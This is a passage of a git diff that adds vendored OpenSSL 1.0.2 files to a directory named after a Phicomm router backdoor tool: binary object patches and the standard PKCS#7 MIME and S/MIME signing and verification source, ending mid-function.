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
E0EhUL>;M1&

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_mime.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_mime.c
new file mode 100644
index 0000000..62fb299
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_mime.c
@@ -0,0 +1,96 @@
+/* pk7_mime.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <stdio.h>
+#include <ctype.h>
+#include "cryptlib.h"
+#include <openssl/rand.h>
+#include <openssl/x509.h>
+#include <openssl/asn1.h>
+
+/* PKCS#7 wrappers round generalised stream and MIME routines */
+
+int i2d_PKCS7_bio_stream(BIO *out, PKCS7 *p7, BIO *in, int flags)
+{
+    return i2d_ASN1_bio_stream(out, (ASN1_VALUE *)p7, in, flags,
+                               ASN1_ITEM_rptr(PKCS7));
+}
+
+int PEM_write_bio_PKCS7_stream(BIO *out, PKCS7 *p7, BIO *in, int flags)
+{
+    return PEM_write_bio_ASN1_stream(out, (ASN1_VALUE *)p7, in, flags,
+                                     "PKCS7", ASN1_ITEM_rptr(PKCS7));
+}
+
+int SMIME_write_PKCS7(BIO *bio, PKCS7 *p7, BIO *data, int flags)
+{
+    STACK_OF(X509_ALGOR) *mdalgs;
+    int ctype_nid = OBJ_obj2nid(p7->type);
+    if (ctype_nid == NID_pkcs7_signed)
+        mdalgs = p7->d.sign->md_algs;
+    else
+        mdalgs = NULL;
+
+    flags ^= SMIME_OLDMIME;
+
+    return SMIME_write_ASN1(bio, (ASN1_VALUE *)p7, data, flags,
+                            ctype_nid, NID_undef, mdalgs,
+                            ASN1_ITEM_rptr(PKCS7));
+}
+
+PKCS7 *SMIME_read_PKCS7(BIO *bio, BIO **bcont)
+{
+    return (PKCS7 *)SMIME_read_ASN1(bio, bcont, ASN1_ITEM_rptr(PKCS7));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_mime.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_mime.o
new file mode 100644
index 0000000000000000000000000000000000000000..955b2cde6c7d4bbcd3ac50134593cc1273930367
GIT binary patch
literal 2544
zcmbtV&1(};5T7*FM$|Qa2mByl(Ta6VYN6^uvaLzCn%ZL8gD9*?yK1yaYO=vrL4|@C
zVnsZ7_7CvjKOhwJB7#Rj5U(nDP&_Ci=*)X>((UW^q62Sd-f!kNZ{M5Qx3|;TOj{@f
zEFm}!i!(+6rdKc8DPg9-fc5Zw!|q?%`Bj8`riYxbCsT*5v7yHAT;sJp_a$aGZ^i7!
zSZBm;^mcxtXuH|lX*UtE8Vkt<YwqW^dc<yK;&w9?x$~nv+xVDHzG}R)=XX(bZd8)y
zUUr?c&cC2l?fI?b5pOYiY9QAKFgP%9EZ#L<sF%HZ{HS@@OdL%1)x|V<t0!S5diP5h
zpdG1E9JG_c)8o(vus~QC2gw$xAavslgl3|l9qT$G5AmRgvs3xVCLx^=7Ql9;yHTG|
zwnI8&MDMqqFk*AzjFD)wj3btj8Zu&*5$!i3ay?JQb6zzKR8+He`1U8r84j!{?TvT0
zlob}Iu@s|OSe#A}-mx4M@wkxy3B#IY=sJOjK3e7rgRl9NcO&XezJ2i-?M0kzf1*Px
z;OQ0cvxrlE&c$`4nlOfDOCF#_@%t1aYK-<196|9<SHPbmPI>O4CSmRypDi5xn7-QQ
zl!_(SoB%UBkbq*(q$AqjDHJPC&8xck5=fxvfisvL>9?}ZNG6j@k2zyje>Uw1j+Hx|
zTtZ0?JJ+j4&lR9dz}c3#1W|c%!$ZSqMU&s)NdHNvQn=DnE>42qODqN88>(0K10n!`
zI}5)@pdR`CM+(<N$9Jo9A)LC5<EhRh^i6NV!FY{86g|%k35)p6Xmk9$!u5FBzcRn!
zi{InRL$%~Qk9;`YTa3pQPWfrD^eTgK?h9MPx&LM~ocjsP+HA?o7f^dusV}otb*J*C
z=gxRwPUgKln1xym%xZ-u6rMDbU`|v@CAW+r<%;K;cvT*(dHIQ}YJRC)H>azWX}9Xl
zB9#)lmz|5%e97gV{GW~^o$fmQMo1w>@>r_YQ~#IkKo9jmsudxPCj_E=l?v9PCNAG#
zF@@9pLb!f&zEyr*>Fal60OkBweiFHqvj>M?czyj`czxC>B$1u)lhJ;!<_9#Kd8~)f
z&$d6bBM1zLrF)gWX@751o`~YdY2p(;e}=B1L7_UoOY!e<pwc>j3h|)&KU^gV7Zi``
zPxlA&x&A?G6Xls&KdN4g?gPr9^C_oZdxT&?fgfn%6P31w(0?z8|5d&J%~qr|bpBsR
C<S0o1

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_smime.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_smime.c
new file mode 100644
index 0000000..dbd4100
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_smime.c
@@ -0,0 +1,586 @@
+/* pk7_smime.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/* Simple PKCS#7 processing functions */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+
+static int pkcs7_copy_existing_digest(PKCS7 *p7, PKCS7_SIGNER_INFO *si);
+
+PKCS7 *PKCS7_sign(X509 *signcert, EVP_PKEY *pkey, STACK_OF(X509) *certs,
+                  BIO *data, int flags)
+{
+    PKCS7 *p7;
+    int i;
+
+    if (!(p7 = PKCS7_new())) {
+        PKCS7err(PKCS7_F_PKCS7_SIGN, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    if (!PKCS7_set_type(p7, NID_pkcs7_signed))
+        goto err;
+
+    if (!PKCS7_content_new(p7, NID_pkcs7_data))
+        goto err;
+
+    if (pkey && !PKCS7_sign_add_signer(p7, signcert, pkey, NULL, flags)) {
+        PKCS7err(PKCS7_F_PKCS7_SIGN, PKCS7_R_PKCS7_ADD_SIGNER_ERROR);
+        goto err;
+    }
+
+    if (!(flags & PKCS7_NOCERTS)) {
+        for (i = 0; i < sk_X509_num(certs); i++) {
+            if (!PKCS7_add_certificate(p7, sk_X509_value(certs, i)))
+                goto err;
+        }
+    }
+
+    if (flags & PKCS7_DETACHED)
+        PKCS7_set_detached(p7, 1);
+
+    if (flags & (PKCS7_STREAM | PKCS7_PARTIAL))
+        return p7;
+
+    if (PKCS7_final(p7, data, flags))
+        return p7;
+
+ err:
+    PKCS7_free(p7);
+    return NULL;
+}
+
+int PKCS7_final(PKCS7 *p7, BIO *data, int flags)
+{
+    BIO *p7bio;
+    int ret = 0;
+    if (!(p7bio = PKCS7_dataInit(p7, NULL))) {
+        PKCS7err(PKCS7_F_PKCS7_FINAL, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+
+    SMIME_crlf_copy(data, p7bio, flags);
+
+    (void)BIO_flush(p7bio);
+
+    if (!PKCS7_dataFinal(p7, p7bio)) {
+        PKCS7err(PKCS7_F_PKCS7_FINAL, PKCS7_R_PKCS7_DATASIGN);
+        goto err;
+    }
+
+    ret = 1;
+
+ err:
+    BIO_free_all(p7bio);
+
+    return ret;
+
+}
+
+/* Check to see if a cipher exists and if so add S/MIME capabilities */
+
+static int add_cipher_smcap(STACK_OF(X509_ALGOR) *sk, int nid, int arg)
+{
+    if (EVP_get_cipherbynid(nid))
+        return PKCS7_simple_smimecap(sk, nid, arg);
+    return 1;
+}
+
+static int add_digest_smcap(STACK_OF(X509_ALGOR) *sk, int nid, int arg)
+{
+    if (EVP_get_digestbynid(nid))
+        return PKCS7_simple_smimecap(sk, nid, arg);
+    return 1;
+}
+
+PKCS7_SIGNER_INFO *PKCS7_sign_add_signer(PKCS7 *p7, X509 *signcert,
+                                         EVP_PKEY *pkey, const EVP_MD *md,
+                                         int flags)
+{
+    PKCS7_SIGNER_INFO *si = NULL;
+    STACK_OF(X509_ALGOR) *smcap = NULL;
+    if (!X509_check_private_key(signcert, pkey)) {
+        PKCS7err(PKCS7_F_PKCS7_SIGN_ADD_SIGNER,
+                 PKCS7_R_PRIVATE_KEY_DOES_NOT_MATCH_CERTIFICATE);
+        return NULL;
+    }
+
+    if (!(si = PKCS7_add_signature(p7, signcert, pkey, md))) {
+        PKCS7err(PKCS7_F_PKCS7_SIGN_ADD_SIGNER,
+                 PKCS7_R_PKCS7_ADD_SIGNATURE_ERROR);
+        return NULL;
+    }
+
+    if (!(flags & PKCS7_NOCERTS)) {
+        if (!PKCS7_add_certificate(p7, signcert))
+            goto err;
+    }
+
+    if (!(flags & PKCS7_NOATTR)) {
+        if (!PKCS7_add_attrib_content_type(si, NULL))
+            goto err;
+        /* Add SMIMECapabilities */
+        if (!(flags & PKCS7_NOSMIMECAP)) {
+            if (!(smcap = sk_X509_ALGOR_new_null())) {
+                PKCS7err(PKCS7_F_PKCS7_SIGN_ADD_SIGNER, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+            if (!add_cipher_smcap(smcap, NID_aes_256_cbc, -1)
+                || !add_digest_smcap(smcap, NID_id_GostR3411_94, -1)
+                || !add_cipher_smcap(smcap, NID_id_Gost28147_89, -1)
+                || !add_cipher_smcap(smcap, NID_aes_192_cbc, -1)
+                || !add_cipher_smcap(smcap, NID_aes_128_cbc, -1)
+                || !add_cipher_smcap(smcap, NID_des_ede3_cbc, -1)
+                || !add_cipher_smcap(smcap, NID_rc2_cbc, 128)
+                || !add_cipher_smcap(smcap, NID_rc2_cbc, 64)
+                || !add_cipher_smcap(smcap, NID_des_cbc, -1)
+                || !add_cipher_smcap(smcap, NID_rc2_cbc, 40)
+                || !PKCS7_add_attrib_smimecap(si, smcap))
+                goto err;
+            sk_X509_ALGOR_pop_free(smcap, X509_ALGOR_free);
+            smcap = NULL;
+        }
+        if (flags & PKCS7_REUSE_DIGEST) {
+            if (!pkcs7_copy_existing_digest(p7, si))
+                goto err;
+            if (!(flags & PKCS7_PARTIAL) && !PKCS7_SIGNER_INFO_sign(si))
+                goto err;
+        }
+    }
+    return si;
+ err:
+    if (smcap)
+        sk_X509_ALGOR_pop_free(smcap, X509_ALGOR_free);
+    return NULL;
+}
+
+/*
+ * Search for a digest matching SignerInfo digest type and if found copy
+ * across.
+ */
+
+static int pkcs7_copy_existing_digest(PKCS7 *p7, PKCS7_SIGNER_INFO *si)
+{
+    int i;
+    STACK_OF(PKCS7_SIGNER_INFO) *sinfos;
+    PKCS7_SIGNER_INFO *sitmp;
+    ASN1_OCTET_STRING *osdig = NULL;
+    sinfos = PKCS7_get_signer_info(p7);
+    for (i = 0; i < sk_PKCS7_SIGNER_INFO_num(sinfos); i++) {
+        sitmp = sk_PKCS7_SIGNER_INFO_value(sinfos, i);
+        if (si == sitmp)
+            break;
+        if (sk_X509_ATTRIBUTE_num(sitmp->auth_attr) <= 0)
+            continue;
+        if (!OBJ_cmp(si->digest_alg->algorithm, sitmp->digest_alg->algorithm)) {
+            osdig = PKCS7_digest_from_attributes(sitmp->auth_attr);
+            break;
+        }
+
+    }
+
+    if (osdig)
+        return PKCS7_add1_attrib_digest(si, osdig->data, osdig->length);
+
+    PKCS7err(PKCS7_F_PKCS7_COPY_EXISTING_DIGEST,
+             PKCS7_R_NO_MATCHING_DIGEST_TYPE_FOUND);
+    return 0;
+}
+
+int PKCS7_verify(PKCS7 *p7, STACK_OF(X509) *certs, X509_STORE *store,
+                 BIO *indata, BIO *out, int flags)
+{
+    STACK_OF(X509) *signers;
+    X509 *signer;
+    STACK_OF(PKCS7_SIGNER_INFO) *sinfos;
+    PKCS7_SIGNER_INFO *si;
+    X509_STORE_CTX cert_ctx;
+    char buf[4096];
+    int i, j = 0, k, ret = 0;
+    BIO *p7bio;
+    BIO *tmpin, *tmpout;
+
+    if (!p7) {
+        PKCS7err(PKCS7_F_PKCS7_VERIFY, PKCS7_R_INVALID_NULL_POINTER);
+        return 0;
+    }
+
+    if (!PKCS7_type_is_signed(p7)) {
+        PKCS7err(PKCS7_F_PKCS7_VERIFY, PKCS7_R_WRONG_CONTENT_TYPE);
+        return 0;
+    }
+
+    /* Check for no data and no content: no data to verify signature */
+    if (PKCS7_get_detached(p7) && !indata) {
+        PKCS7err(PKCS7_F_PKCS7_VERIFY, PKCS7_R_NO_CONTENT);
+        return 0;
+    }
+#if 0
+    /*
+     * NB: this test commented out because some versions of Netscape
+     * illegally include zero length content when signing data.
+     */
+
+    /* Check for data and content: two sets of data */
+    if (!PKCS7_get_detached(p7) && indata) {
+        PKCS7err(PKCS7_F_PKCS7_VERIFY, PKCS7_R_CONTENT_AND_DATA_PRESENT);
+        return 0;
+    }
+#endif
+
+    sinfos = PKCS7_get_signer_info(p7);
+
+    if (!sinfos || !sk_PKCS7_SIGNER_INFO_num(sinfos)) {
+        PKCS7err(PKCS7_F_PKCS7_VERIFY, PKCS7_R_NO_SIGNATURES_ON_DATA);
+        return 0;
+    }
+
+    signers = PKCS7_get0_signers(p7, certs, flags);
+
+    if (!signers)
+        return 0;
+
+    /* Now verify the certificates */
+
+    if (!(flags & PKCS7_NOVERIFY))
+        for (k = 0; k < sk_X509_num(signers); k++) {
+            signer = sk_X509_value(signers, k);
+            if (!(flags & PKCS7_NOCHAIN)) {
+                if (!X509_STORE_CTX_init(&cert_ctx, store, signer,
+                                         p7->d.sign->cert)) {
+                    PKCS7err(PKCS7_F_PKCS7_VERIFY, ERR_R_X509_LIB);
+                    sk_X509_free(signers);
+                    return 0;
+                }
+                X509_STORE_CTX_set_default(&cert_ctx, "smime_sign");
+            } else if (!X509_STORE_CTX_init(&cert_ctx, store, signer, NULL)) {
+                PKCS7err(PKCS7_F_PKCS7_VERIFY, ERR_R_X509_LIB);
+                sk_X509_free(signers);
+                return 0;
+            }
+            if (!(flags & PKCS7_NOCRL))
+                X509_STORE_CTX_set0_crls(&cert_ctx, p7->d.sign->crl);
+            i = X509_verify_cert(&cert_ctx);
+            if (i <= 0)
+                j = X509_STORE_CTX_get_error(&cert_ctx);
+            X509_STORE_CTX_cleanup(&cert_ctx);
+            if (i <= 0) {
+                PKCS7err(PKCS7_F_PKCS7_VERIFY,
+                         PKCS7_R_CERTIFICATE_VERIFY_ERROR);
+                ERR_add_error_data(2, "Verify error:",
+                                   X509_verify_cert_error_string(j));
+                sk_X509_free(signers);
+                return 0;
+            }
+            /* Check for revocation status here */
+        }
+
+    /*
+     * Performance optimization: if the content is a memory BIO then store
+     * its contents in a temporary read only memory BIO. This avoids
+     * potentially large numbers of slow copies of data which will occur when
+     * reading from a read write memory BIO when signatures are calculated.
+     */
+
+    if (indata && (BIO_method_type(indata) == BIO_TYPE_MEM)) {
+        char *ptr;
+        long len;
+        len = BIO_get_mem_data(indata, &ptr);
+        tmpin = BIO_new_mem_buf(ptr, len);
+        if (tmpin == NULL) {
+            PKCS7err(PKCS7_F_PKCS7_VERIFY, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+    } else
+        tmpin = indata;
+
+    if (!(p7bio = PKCS7_dataInit(p7, tmpin)))
+        goto err;
+
+    if (flags & PKCS7_TEXT) {
+        if (!(tmpout = BIO_new(BIO_s_mem()))) {
+            PKCS7err(PKCS7_F_PKCS7_VERIFY, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        BIO_set_mem_eof_return(tmpout, 0);
+    } else
+        tmpout = out;
+
+    /* We now have to 'read' from p7bio to calculate digests etc. */
+    for (;;) {
+        i = BIO_read(p7bio, buf, sizeof(buf));
+        if (i <= 0)
+            break;
+        if (tmpout)
+            BIO_write(tmpout, buf, i);
+    }
+
+    if (flags & PKCS7_TEXT) {
+        if (!SMIME_text(tmpout, out)) {
+            PKCS7err(PKCS7_F_PKCS7_VERIFY, PKCS7_R_SMIME_TEXT_ERROR);
+            BIO_free(tmpout);
+            goto err;
+        }
+        BIO_free(tmpout);
+    }
+
+    /* Now Verify All Signatures */
+    if (!(flags & PKCS7_NOSIGS))
+        for (i = 0; i < sk_PKCS7_SIGNER_INFO_num(sinfos); i++) {
+            si = sk_PKCS7_SIGNER_INFO_value(sinfos, i);
+            signer = sk_X509_value(signers, i);
+            j = PKCS7_signatureVerify(p7bio, p7, si, signer);
+            if (j <= 0) {
+                PKCS7err(PKCS7_F_PKCS7_VERIFY, PKCS7_R_SIGNATURE_FAILURE);
+                goto err;
+            }
+        }
+
+    ret = 1;
+
+ err:
+
+    if (tmpin == indata) {
+        if (indata)
+            BIO_pop(p7bio);
+    }
+    BIO_free_all(p7bio);
+
+    sk_X509_free(signers);
+
+    return ret;
+}
+
+STACK_OF(X509) *PKCS7_get0_signers(PKCS7 *p7, STACK_OF(X509) *certs,
+                                   int flags)
+{
+    STACK_OF(X509) *signers;
+    STACK_OF(PKCS7_SIGNER_INFO) *sinfos;
+    PKCS7_SIGNER_INFO *si;
+    PKCS7_ISSUER_AND_SERIAL *ias;
+    X509 *signer;
+    int i;
+
+    if (!p7) {
+        PKCS7err(PKCS7_F_PKCS7_GET0_SIGNERS, PKCS7_R_INVALID_NULL_POINTER);
+        return NULL;
+    }
+
+    if (!PKCS7_type_is_signed(p7)) {
+        PKCS7err(PKCS7_F_PKCS7_GET0_SIGNERS, PKCS7_R_WRONG_CONTENT_TYPE);
+        return NULL;
+    }
+
+    /* Collect all the signers together */
+
+    sinfos = PKCS7_get_signer_info(p7);
+
+    if (sk_PKCS7_SIGNER_INFO_num(sinfos) <= 0) {
+        PKCS7err(PKCS7_F_PKCS7_GET0_SIGNERS, PKCS7_R_NO_SIGNERS);
+        return 0;
+    }
+
+    if (!(signers = sk_X509_new_null())) {
+        PKCS7err(PKCS7_F_PKCS7_GET0_SIGNERS, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+
+    for (i = 0; i < sk_PKCS7_SIGNER_INFO_num(sinfos); i++) {
+        si = sk_PKCS7_SIGNER_INFO_value(sinfos, i);
+        ias = si->issuer_and_serial;
+        signer = NULL;
+        /* If any certificates passed they take priority */
+        if (certs)
+            signer = X509_find_by_issuer_and_serial(certs,
+                                                    ias->issuer, ias->serial);
+        if (!signer && !(flags & PKCS7_NOINTERN)
+            && p7->d.sign->cert)
+            signer =
